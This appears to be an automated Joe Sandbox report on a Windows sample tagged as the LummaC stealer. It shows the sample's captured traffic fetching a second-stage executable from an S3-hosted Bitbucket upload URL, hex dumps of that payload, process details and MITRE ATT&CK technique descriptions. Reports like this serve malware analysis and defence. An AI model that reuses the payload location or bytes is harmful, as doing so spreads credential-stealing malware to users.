X-Xss-Protection: 1; mode=block Atl-Traceid: 3d7efce767574a9096271cb7d5780696 Atl-Request-Id: 3d7efce7-6757-4a90-9627-1cb7d5780696 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=179,atl-edge-internal;dur=6,atl-edge-upstream;dur=178,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	16.182.108.137	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:41 UTC	1352	OUT	GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2 [TRUNCATED] Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bbuseruploads.s3.amazonaws.com
2024-12-24 10:22:41 UTC	554	IN	HTTP/1.1 200 OK x-amz-id-2: 4c6shQ4qXSPlBrRenP/IdQVeADyYfQgJpc6Sa5673EVmMRssfVkjSimT051D3yyXzyHIbJZV+04= x-amz-request-id: K6QB3MBDQQV5XVPT Date: Tue, 24 Dec 2024 10:22:42 GMT Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT ETag: "73565a0bcdcb7ff5f9ce005a2530e215" x-amz-server-side-encryption: AES256 x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS Content-Disposition: attachment; filename="FormattingCharitable.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Content-Length: 1325507 Server: AmazonS3 Connection: close
2024-12-24 10:22:42 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
2024-12-24 10:22:42 UTC	470	IN	Data Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39 Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;\|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
2024-12-24 10:22:42 UTC	16384	IN	Data Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;\|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
2024-12-24 10:22:42 UTC	1024	IN	Data Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20 Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
2024-12-24 10:22:42 UTC	16384	IN	Data Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72 Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
2024-12-24 10:22:42 UTC	1024	IN	Data Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y1rh4euZ07z~k\SAZ(\a,p?
2024-12-24 10:22:42 UTC	1749	IN	Data Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3 Data Ascii: /od}z:@@eCY\| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg\|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i\|g`
2024-12-24 10:22:42 UTC	16384	IN	Data Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{\|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
2024-12-24 10:22:42 UTC	1024	IN	Data Raw: 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5 cf fb d0 f1 3b 9e a0 da 47 87 50 21 1b 80 74 df 40 4a ce cc Data Ascii: \|Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U\|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S;GP!t@J
2024-12-24 10:22:42 UTC	16384	IN	Data Raw: f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69 6c 0e f0 1e 6d f3 65 43 97 63 00 ac 8c 80 95 09 d0 c5 1f 88 Data Ascii: zRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}\|W Qp9Rx@Y%X$=x$Fqx.ve6N<DilmeCc

Target ID:	0
Start time:	05:22:07
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\SFtDA07UDr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SFtDA07UDr.exe"
Imagebase:	0xaf0000
File size:	2'911'744 bytes
MD5 hash:	C7C35AA98A21F2D9B5A584F5F32B91A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:22:43
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 2044
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SFtDA07UDr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SFtDA07UDr.exe_45cbe07c72cddbd1a06ff14a664cd7ed68f9a0_510239c7_9667593d-5e68-47a3-89b3-c5c54eca2509\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC52E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9C2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA7F.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
SFtDA07UDr.exe